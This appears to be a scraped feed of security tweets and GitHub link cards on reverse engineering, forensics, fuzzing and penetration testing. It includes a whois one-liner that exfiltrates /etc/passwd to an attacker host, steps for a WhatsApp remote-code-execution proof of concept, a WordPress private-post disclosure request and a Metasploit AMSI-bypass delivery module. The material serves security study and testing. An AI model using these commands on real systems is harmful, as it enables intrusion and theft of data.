How to Reverse Engineer an iOS App and macOS Software
https://www.apriorit.com/dev-blog/363-how-to-reverse-engineer-os-x-and-ios-software
https://www.apriorit.com/dev-blog/363-how-to-reverse-engineer-os-x-and-ios-software
Apriorit
How to Reverse Engineer an iOS App - Apriorit
Learn how to reverse engineer an iOS app, break down its components, and understand functionality without source code access for debugging or maintenance.
The Linux Forensics workshop (labs, slides, forensic images "E01")+talk done at OSDFCon 2019, is now available here: https://t.co/7aeHMNaVQI
GitHub
ashemery/LinuxForensics
Everything related to Linux Forensics. Contribute to ashemery/LinuxForensics development by creating an account on GitHub.
Cheatsheet-God:-
Penetration Testing Biggest Reference Bank - OSCP / PTP & PTX Cheatsheet:-
https://t.co/mApUr4FBqW
Penetration Testing Biggest Reference Bank - OSCP / PTP & PTX Cheatsheet:-
https://t.co/mApUr4FBqW
GitHub
OlivierLaflamme/Cheatsheet-God
Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet - OlivierLaflamme/Cheatsheet-God
Have limited ways to exfiltrate data? Use Whois!
attacker: nc -l -v -p 53 | sed "s/ //g" | base64 -d
victim: whois -h $attackerIP -p 53 cat /etc/passwd | base64
attacker: nc -l -v -p 53 | sed "s/ //g" | base64 -d
victim: whois -h $attackerIP -p 53 cat /etc/passwd | base64
Privesc - Windows batch script that finds misconfiguration issues which can lead to privilege escalation https://t.co/TQacBYeylG
GitHub
GitHub - enjoiz/Privesc: Windows batch script that finds misconfiguration issues which can lead to privilege escalation.
Windows batch script that finds misconfiguration issues which can lead to privilege escalation. - enjoiz/Privesc
[PoC] CVE-2019-11932 Whatsapp 2.19.216 Remote Code Execution
1. set the listner ip (nc -lvp 5555)
2. run ./exploit and save the content to .gif
3. exploit.gif file and send it as Document with WhatsApp to another WhatsApp user
https://t.co/dpeiJOpg4m
https://t.co/lXWWAcq8Y4
1. set the listner ip (nc -lvp 5555)
2. run ./exploit and save the content to .gif
3. exploit.gif file and send it as Document with WhatsApp to another WhatsApp user
https://t.co/dpeiJOpg4m
https://t.co/lXWWAcq8Y4
GitHub
GitHub - dorkerdevil/CVE-2019-11932: double-free bug in WhatsApp exploit poc
double-free bug in WhatsApp exploit poc. Contribute to dorkerdevil/CVE-2019-11932 development by creating an account on GitHub.
A curated list of fuzzing resources ( Books, courses - free & paid, videos, tools, tutorials & vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis.
https://t.co/5zu0MtfDPT
https://t.co/5zu0MtfDPT
GitHub
secfigo/Awesome-Fuzzing
A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Develo...
Collect all URL's, sub-domains, emails, phone numbers and fuzz all parameters for XSS/SQLi/RCE/Traversal flaws with BlackWidow https://t.co/K9EOzIpaxm https://t.co/jJzZhsfoWn
GitHub
GitHub - 1N3/BlackWidow: A Python based web application scanner to gather OSINT and fuzz for OWASP vulnerabilities on a target…
A Python based web application scanner to gather OSINT and fuzz for OWASP vulnerabilities on a target website. - GitHub - 1N3/BlackWidow: A Python based web application scanner to gather OSINT and ...
WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
POC: GET /wordpress/?static=1&order=asc
Fix: Remove the static query property
https://t.co/dg5TSxIyKs
Analsyis: https://t.co/Wc5QY2Ui9s
POC: GET /wordpress/?static=1&order=asc
Fix: Remove the static query property
https://t.co/dg5TSxIyKs
Analsyis: https://t.co/Wc5QY2Ui9s
GitHub
Query: Remove the static query property. · WordPress/WordPress@f82ed75
Prevent unauthenticated views of publicly queryables content types.
Props aaroncampbell, whyisjake, nickdaugherty, xknown.
Built from https://develop.svn.wordpress.org/branches/5.2@46479
git-sv...
Props aaroncampbell, whyisjake, nickdaugherty, xknown.
Built from https://develop.svn.wordpress.org/branches/5.2@46479
git-sv...
One command to rule them all!
Just finished to update @metasploit web_delivery to automatically bypass AMSI/SBL with latest definitions.
Testing and feedbacks are welcome!
https://t.co/TSPr2mIcsc
https://t.co/R4d4wSIfpB
Test it with:
msfconsole -r web.rc
Just finished to update @metasploit web_delivery to automatically bypass AMSI/SBL with latest definitions.
Testing and feedbacks are welcome!
https://t.co/TSPr2mIcsc
https://t.co/R4d4wSIfpB
Test it with:
msfconsole -r web.rc
GitHub
Add support for AMSI/SBL bypass to PSH web_delivery by phra · Pull Request #12446 · rapid7/metasploit-framework
Related to rapid7/rex-powershell#17
Requires rapid7/rex-powershell#19
Verification
List the steps needed to make sure this thing works
Start msfconsole
use exploit/multi/script/web_delivery
set...
Requires rapid7/rex-powershell#19
Verification
List the steps needed to make sure this thing works
Start msfconsole
use exploit/multi/script/web_delivery
set...